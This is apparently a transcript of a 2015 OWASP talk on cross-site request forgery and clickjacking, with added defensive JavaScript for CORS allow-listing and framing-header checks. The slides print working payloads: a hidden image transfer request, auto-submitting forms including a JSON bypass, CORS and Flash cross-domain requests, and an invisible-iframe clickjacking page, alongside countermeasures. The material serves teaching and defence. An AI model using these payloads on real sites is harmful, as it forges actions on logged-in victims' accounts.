Cross-site request forgery:
Ways to exploit, ways to prevent
Paulius Leščinskas, OWASP EEE Lithuania
2015-10-07
Paulius Leščinskas talk on 7 Oct 2015 during the OWASP LT #3/ OWASP EEE event.

1. Cross-site request forgery: Ways to exploit, ways to prevent. Paulius Leščinskas, OWASP EEE Lithuania, 2015-10-07
2. About Me. Paulius Leščinskas, Pod owner @ Adform. http://lescinskas.lt, Paulius.Lescinskas@gmail.com, @lescinskas, https://www.linkedin.com/in/pluton
3. Cross-site request forgery (CSRF). A CSRF attack forces a logged-on victim's browser to send a forged HTTP request, including the victim's session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim's browser to generate requests the vulnerable application thinks are legitimate requests from the victim. Thank you http://www.seclab.cs.sunysb.edu/seclab/jcsrf/ for the image.
4. Cross-site request forgery (CSRF). Typical impact:
   • Initiate transactions (modify data)
   • Access sensitive data
   Prerequisite: the victim MUST be logged in to the target system.
   Typical example:
   <img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />
5. Cross-site request forgery (CSRF). What about POST?
6. Cross-site request forgery (CSRF). Example 2 (POST request):
   <form method="post" action="https://www.example.com/deleteUser">
     <input type="hidden" name="id" value="1" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
7. Cross-site request forgery (CSRF). No forms? Just RESTful JSON APIs?
8. Cross-site request forgery (CSRF). The same data is sent differently as the raw HTTP body. For example, Name: John Doe, Text: 1 + 2 = 3
   • Via HTML form (application/x-www-form-urlencoded): Name=John+Doe&Text=1+%2B+2+%3D+3
   • Using a RESTful Web API formatted as JSON: {"Name": "John Doe", "Text": "1 + 2 = 3"}
9. Cross-site request forgery (CSRF). Example 3 (POST JSON request, bypassing the x-www-form-urlencoded structure; the form must use enctype="text/plain" so the browser does not URL-encode the field):
   <form method="post" enctype="text/plain" action="https://www.example.com/deleteUser">
     <input type="hidden" name='{"id": 1, "ignore-me": "' value='test"}' />
   </form>
   <script>
     document.forms[0].submit();
   </script>
   Data sent: {"id": 1, "ignore-me": "=test"}
   http://itsecurityconcepts.com/2014/04/22/csrf-on-json-requests/
10. Cross-site request forgery (CSRF). All HTTP methods (GET/POST/PUT/PATCH/DELETE ...) with any data encoding can be called using JavaScript (XMLHttpRequest, aka XHR, aka Ajax) if your Cross-origin resource sharing (CORS) headers allow XHR calls from any location:
   OPTIONS /foo/bar
   Host: example.com
   Origin: http://foo.com
   Vulnerable if: Access-Control-Allow-Origin: *
   jQuery example:
   $.ajax({
     url: 'http://example.com/foo/bar',
     type: 'DELETE',
     data: {"id": 1},
     success: function(result) {
       // Do something with the result
     }
   });
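The CORS decision on this slide, as an added example that is not the talk's code: a preflight answered from an explicit origin allow-list beside the weak variant that echoes any Origin. The host names are assumptions. One caveat worth knowing when reading the slide: browsers refuse to send a credentialed (cookie-carrying) request when the preflight answers `Access-Control-Allow-Origin: *`, so the setting that exposes cookie-authenticated endpoints is echoing the request's Origin together with `Access-Control-Allow-Credentials: true`; the wildcard still exposes anything readable without authentication.

```javascript
// Added example, not code from the talk: answering CORS preflights from an
// explicit origin allow-list. The host names are assumptions for the demo.
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);
const ALLOWED_METHODS = 'GET, POST, PUT, PATCH, DELETE';

// Weak variant: echoes any Origin and allows credentials, so a page on any
// site can drive the API with the victim's cookies.
function weakCorsHeaders(requestHeaders) {
  return {
    'Access-Control-Allow-Origin': requestHeaders.origin || '*',
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': ALLOWED_METHODS,
  };
}

// Hardened variant: only an allow-listed Origin gets CORS headers. Returning
// null means "send no CORS headers", and the browser then blocks the call.
function corsHeaders(requestHeaders) {
  const origin = requestHeaders.origin;
  if (!origin || !ALLOWED_ORIGINS.has(origin)) return null;
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': ALLOWED_METHODS,
    'Access-Control-Allow-Headers': 'Content-Type, X-CSRF-Token',
    'Access-Control-Max-Age': '600',
    'Vary': 'Origin', // a shared cache must not replay one origin's answer to another
  };
}

// Models the browser's decision: "*" is accepted only for requests sent without
// credentials; a credentialed request needs its exact origin echoed back plus
// Access-Control-Allow-Credentials: true.
function browserAllows(requestOrigin, responseHeaders, withCredentials) {
  if (!responseHeaders) return false;
  const acao = responseHeaders['Access-Control-Allow-Origin'];
  if (acao === '*') return !withCredentials;
  if (acao !== requestOrigin) return false;
  return !withCredentials || responseHeaders['Access-Control-Allow-Credentials'] === 'true';
}
```

Apply `corsHeaders` to every OPTIONS preflight and to the actual response; the `Vary: Origin` line matters as soon as a CDN or reverse proxy caches API responses.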
11. Cross-site request forgery (CSRF). Flash to the attack!
12. Cross-site request forgery (CSRF). Example 4 (any HTTP-based request using ActionScript):
   import flash.net.URLRequest;
   import flash.net.URLVariables;
   import flash.net.URLRequestMethod;
   import flash.net.URLRequestHeader;
   import flash.net.URLLoader;

   var loader:URLLoader = new URLLoader();
   var req:URLRequest = new URLRequest("http://www.example.com/deleteUser");
   var header:URLRequestHeader = new URLRequestHeader("Origin", "http://www.test.com"); // Setting Origin header valid until Flash 9 somewhat
   req.requestHeaders.push(header);
   req.method = URLRequestMethod.DELETE;
   req.contentType = 'application/json';
   req.data = '{"id": 1}';
   loader.load(req);
13. Cross-site request forgery (CSRF). ... valid if example.com has a crossdomain.xml like:
   <?xml version="1.0"?>
   <cross-domain-policy>
     <allow-access-from domain="*" secure="false" />
   </cross-domain-policy>
   9 of the 10 Lithuanian TOP10 websites have such a crossdomain.xml, mostly to load assets from Flash-based banner ads.
   Also, you can access ActionScript objects, functions and properties of a SWF file hosted on another domain if that file has Security.allowDomain("*"); (cross-scripting).
14. Cross-site request forgery (CSRF). Countermeasures
   ● Synchronizer token pattern!
   ● Check the Origin header
   ● Appropriate CORS headers
   ● Appropriate crossdomain.xml rules
   ● Short-lived sessions (only reduces likelihood)
   Very hard (impossible?) to prevent CSRF if the website has XSS vulnerabilities.
   https://en.wikipedia.org/wiki/Cross-origin_resource_sharing
   http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html
   https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
15. ClickJacking
16. ClickJacking
17. ClickJacking
   <html>
   <body>
   <iframe src="http://victim.site" style="position: absolute; filter:alpha(opacity=0);opacity:0"></iframe>
   <div style="position: relative; left: 10px; top: 10px; z-index: -1"><a href="#">CLICK ME</a></div>
   </body>
   </html>
   OVERRIDES ALL CSRF PROTECTIONS!
   https://www.owasp.org/index.php/Clickjacking
   http://www.troyhunt.com/2013/05/clickjack-attack-hidden-threat-right-in.html
   https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole
18. ClickJacking Countermeasures. Framebusting: X-Frame-Options (XFO) response HTTP header or meta http-equiv tag
   X-Frame-Options: DENY (disallows the page from being loaded in an IFRAME)
   X-Frame-Options: SAMEORIGIN (allows the page to be loaded in an IFRAME from the same origin)
   X-Frame-Options: ALLOW-FROM https://trusted.domain (allows the page to be loaded from specific origins; unsupported by Chrome and Safari!)
   Worldwide usage: Facebook: DENY, Twitter: SAMEORIGIN, Github: DENY, 60% of Alexa Top 10 use framebusting...
   https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet (+more defense techniques)
   https://www.owasp.org/index.php/Testing_for_Clickjacking_(OTG-CLIENT-009)
   https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options
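The header rules on this slide, as an added example that is not the talk's code: an audit function a practitioner can run over a response's headers to decide whether the page is frameable. It treats ALLOW-FROM as unprotected because of the browser support gap the slide notes, and it also evaluates the Content-Security-Policy `frame-ancestors` directive, which is the standardised replacement for ALLOW-FROM and overrides X-Frame-Options in browsers that support it. The sample headers in the usage are constructed.

```javascript
// Added example, not from the slides: is this response protected against framing?
function framingProtection(headers) {
  const h = {};
  for (const [name, value] of Object.entries(headers)) h[name.toLowerCase()] = value;
  const result = { protected: false, mechanism: null, warnings: [] };

  // A CSP frame-ancestors directive takes precedence over X-Frame-Options in
  // browsers that support it, so it is evaluated first.
  const csp = h['content-security-policy'];
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim())
      .find((d) => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive) {
      const sources = directive.split(/\s+/).slice(1);
      // "*" or a bare scheme such as "https:" lets every host frame the page.
      const permissive = sources.some((s) => s === '*' || /^https?:$/.test(s));
      if (permissive) {
        result.warnings.push(`permissive "${directive}" lets any site frame the page`);
        return result;
      }
      result.protected = true;
      result.mechanism = `CSP ${directive}`;
      return result;
    }
  }

  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    result.protected = true;
    result.mechanism = `X-Frame-Options: ${xfo}`;
    return result;
  }
  if (xfo.startsWith('ALLOW-FROM')) {
    // Chrome and Safari ignore ALLOW-FROM, so the page is frameable there.
    result.warnings.push('X-Frame-Options: ALLOW-FROM is ignored by Chrome and Safari; use CSP frame-ancestors');
    return result;
  }
  if (xfo) result.warnings.push(`unrecognised X-Frame-Options value "${xfo}"`);
  result.warnings.push('no framing protection: the page can be loaded in an invisible iframe');
  return result;
}

// Constructed sample: the headers a hardened response would carry.
const sampleHardened = {
  'X-Frame-Options': 'DENY',
  'Content-Security-Policy': "default-src 'self'; frame-ancestors 'none'",
};
framingProtection(sampleHardened); // protected via the CSP directive
```

Sending both headers, as in the sample, is the usual advice: CSP for current browsers and X-Frame-Options for older ones that understand only the latter.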
19. Thank you!
